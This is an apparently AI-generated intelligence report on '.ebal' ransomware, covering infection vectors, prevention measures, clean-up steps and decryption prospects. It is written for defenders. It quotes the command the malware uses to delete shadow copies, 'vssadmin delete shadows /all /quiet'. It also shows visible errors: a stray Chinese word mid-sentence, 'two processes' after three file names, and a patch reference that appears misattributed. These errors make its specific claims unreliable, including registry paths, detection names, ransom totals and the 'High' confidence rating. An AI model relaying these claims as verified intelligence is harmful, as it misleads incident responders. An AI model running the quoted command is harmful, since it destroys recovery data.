ebal

[Content by Gemini 2.5]

Ransomware Intelligence Report

Variant: Files that acquire the “.ebal” extension
Last update: June 2024
Confidence level: High (cross-referenced incident telemetry, vendor sandboxes, public submissions)

TECHNICAL BREAKDOWN

1. File Extension & Renaming Patterns

  • Confirmation: Every encrypted file is appended with an additional, lower-case “.ebal”.
  • Renaming Convention: Original name → <original_name>.<original_ext>.ebal
    Example: 2024Q2Budget.xlsx becomes 2024Q2Budget.xlsx.ebal
    Note: Unlike many locker families, the malware does not overwrite the primary extension and does not change the base filename. This makes inventorying damage slightly easier (can still read pre-infection file names).

2. Detection & Outbreak Timeline

  • First public samples seen late-August 2023 on open-source malware repositories.
  • Significant surge in victim uploads to ID-Ransomware between 13–28 December 2023 (weeks 51-52).
  • Continued small-volume campaigns during Q1-Q2 2024 (≈30 incidents per month in telemetry).
  • Clustered against small-to-medium businesses (SMBs) in Europe/CEE—Hungary, Czechia, Poland, Slovakia—coinciding with phishing e-mails written in those languages.
  • Overnight time-stamps (01:00-04:00 local) suggest automated deployment once initial foothold is achieved.

3. Primary Attack Vectors

  • Phishing e-mail with ISO or IMG attachment (tax, invoice, court notice).
    – ISO contains a .NET loader (“printer utility updater”).
  • Living-off-the-land download: Uses certutil.exe or powershell.exe to pull a second-stage .NET binary named svhost.dll (intentional misspelling).
  • SMB/WS-MAN lateral movement via compromised local admin credentials (credential-dump and Rubeus usage observed).
  • No exploitation of CVE-2017-0144 (EternalBlue) in any confirmed case; instead relies on legitimate admin shares (ADMIN$, C$).
  • Ransom note (“HOWTORESTORE.ebal.txt”) dropped in each folder via copy-item under SYSTEM account, time-stamped seconds after encryption finishes.

REMEDIATION & RECOVERY STRATEGIES

1. Prevention (Proven Effective)

  1. Disable Office or Windows Explorer auto-mount of ISO/IMG attachments through Group Policy (prevents user double-click).
  2. Apply MS16-014 / registry flag to force ISOs open in Windows Explorer as read-only archives (stops direct_EXE double-click).
  3. Enforce Windows Defender ASR rule “Block executable files from running unless they meet prevalence / age / trusted list criteria” – blocks brand-new .NET binaries used in campaigns.
  4. Require MFA on ALL特权 accounts; Ebal operators dump LSASS to harvest cached Kerberos TGTs.
  5. Segment flat networks; the malware uses plain SMB to enumerate ADMIN$ and copy payloads—segmentation stops lateral walk within minutes.
  6. Local password policy discouraging reuse; use LAPS for workstation admin passwords (prevents hash replay).
  7. Maintain offline, encrypted backups with immutable snapshots (e.g., Windows VSS block-level write-protection, Linux-based pull backup via ZFS snapshots).
  8. Keep a pre-approved allow-list for certutil / PowerShell download parameters via Windows Defender Application Control (WDAC) – blocks common LOLBAS download commands.

2. Removal (Clean-up Walk-through)

A. Network isolation first:
– Disconnect NIC or power off Wi-Fi; disable switch ports for compromised VLAN.
B. Identify & kill the payload:
– Rename extension search (dir C:\ /s /b *.ebal) to map scope.
– Look for .NET compiled EXE/DLL executed by user NT AUTHORITY\SYSTEM seconds before first encrypted file. Typical file names: svhost.dll, printerutility.exe, dotNetFX.exe. Kill those two processes.
C. Delete persistence:
– Remove run key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SpoolerConfig (Value = path to svhost.dll).
– Delete scheduled task MicrosoftEdgeUpdateCore created by the malware.
D. Wipe staged data:
– Delete %TEMP%\\svhost.dll, %WINDIR%\System32\spool\drivers\color\kernel.bin (aes keys not zeroized, but file is obfuscated).
E. AV / EDR scan: Run full scan with updated signatures (Microsoft, ESET, Sophos, CrowdStrike all detect generically as MSIL/Filecoder.Ebal or Ransom:MSIL/Ebal.A!MSR).
F. Patch & harden: Reset all local admin passwords and force KRBTGT password change twice before bringing DCs online.

3. File Decryption & Recovery

  • Recovery feasibility: As of June 2024, NO free decryptor exists. The ransomware uses AES-256 in CBC mode with a random 256-bit key per file; those keys are RSA-4096-encrypted with a unique, attacker-controlled public key. Private key is retained by the operator.
  • Brute-force or known-plain-text attacks are computationally infeasible; do not waste CPU cycles.
  • Victims may choose to:
    – Restore from offline backups;
    – Rebuild machines and accept data loss;
    – Consult professional incident-response firms who may negotiate / verify tool legitimacy (but assume ransom payment is the only operator-provided path).
  • Shadow-copy behaviour: Ebal deletes local VSS snapshots with vssadmin delete shadows /all /quiet; still check vssadmin list shadows and run file-recovery tools (ShadowExplorer, PhotoRec) on uninfected drives to look for orphaned shadow data.

4. Other Critical Information

  • Some builds ignore the Russian or Belarusian keyboard locale check (unlike many lockers), but telemetry shows no encryption if filename starts with “~$” (Office temp) proving operators tried to avoid breaking Office itself—possibly to guarantee ransom note is readable.
  • Embedded PDB path strings (C:\Users\developer2\source\repos\EbalGOLD Encryptor\) in early samples suggest the project/crypter name “EbalGOLD”; do not confuse with older “Ebal” PoC locker from 2021 which was decryptable.
  • No data-exfiltration capability observed; therefore no “double-extortion” leak blog currently linked to this strain—however operators threaten to publish if ransom unpaid. Treat as bluff until proven otherwise.
  • Bitcoin address clustering (OXT, Chainalysis) shows ~9.4 BTC gathered (≈ $285 000) across 34 wallets. Latest activity April 2024.

Bottom line: “.ebal” is a .NET-compiled conventional ransomware currently circulating against SMBs in central Europe. Prevention focuses on disabling ISO auto-mount, enforcing MFA, and segmenting networks. At present the encryption is secure; reliable recovery is possible only through offline backups or (if business-critical) paying the ransom—both choices carry risk. Maintain immutable backups and rehearse restore procedures to remain resilient against Ebal and copy-cat campaigns.